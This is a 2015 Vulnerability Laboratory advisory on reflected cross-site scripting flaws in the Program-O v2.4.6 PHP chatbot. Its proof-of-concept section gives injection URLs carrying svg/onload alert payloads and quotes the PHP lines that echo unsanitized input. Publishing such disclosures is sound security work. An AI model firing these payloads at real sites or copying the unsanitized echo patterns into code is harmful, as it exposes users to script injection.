Document Title: =============== Program-O v2.4.6 - Multiple Web Vulnerabilities References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1414 Release Date: ============= 2015-01-21 Vulnerability Laboratory ID (VL-ID): ==================================== 1414 Common Vulnerability Scoring System: ==================================== 6.3 Product & Service Introduction: =============================== Welcome to the Program O Project website This is the home of the Open Source PHP MySQL AIML Chatbot Project. Program O is an AIML engine written in PHP with MySQL. Here you can find support, help, bot addons, a brilliant and friendly community and ofcourse the Program O download files. (Copy of the Vendor Homepage: http://blog.program-o.com/ ) Abstract Advisory Information: ============================== An independent Vulnerability Laboratory Researcher discovered multiple vulnerabilities in the official Program-O v2.4.6 web-application. Vulnerability Disclosure Timeline: ================================== 2015-01-21: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Program O Product: Program O AIML Chatbot - Web Application 2.4.6 Exploitation Technique: ======================= Remote Severity Level: =============== High Proof of Concept (PoC): ======================= 1.1 Client-Side Cross Site Scripting Vulnerability The xss vulnerabilities can be exploited by remote attackers without privileged application user account and with low user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. http://localhost/Program-O/gui/xml/index.php?convo_id=444%22/%3E%3Csvg/onload=alert%281%29%3E Cause echo $convo_id; $post_vars = filter_input_array(INPUT_POST) : array(); $get_vars = filter_input_array(INPUT_GET) : array(); $request_vars = array_merge($get_vars, $post_vars); $convo_id = $request_vars['convo_id'] : get_convo_id (); 1.2 Client-Side Cross Site Scripting Vulnerability http://localhost/Program-O/gui/xml/index.php/%22%3E%3Csvg/onload=alert%280%29%3E ./Program-O/gui/xml/index.php echo $_SERVER['PHP_SELF']; 3. /logs/index.php $iframeURL = $_POST['file'] : 'about:blank'; echo $iframeURL;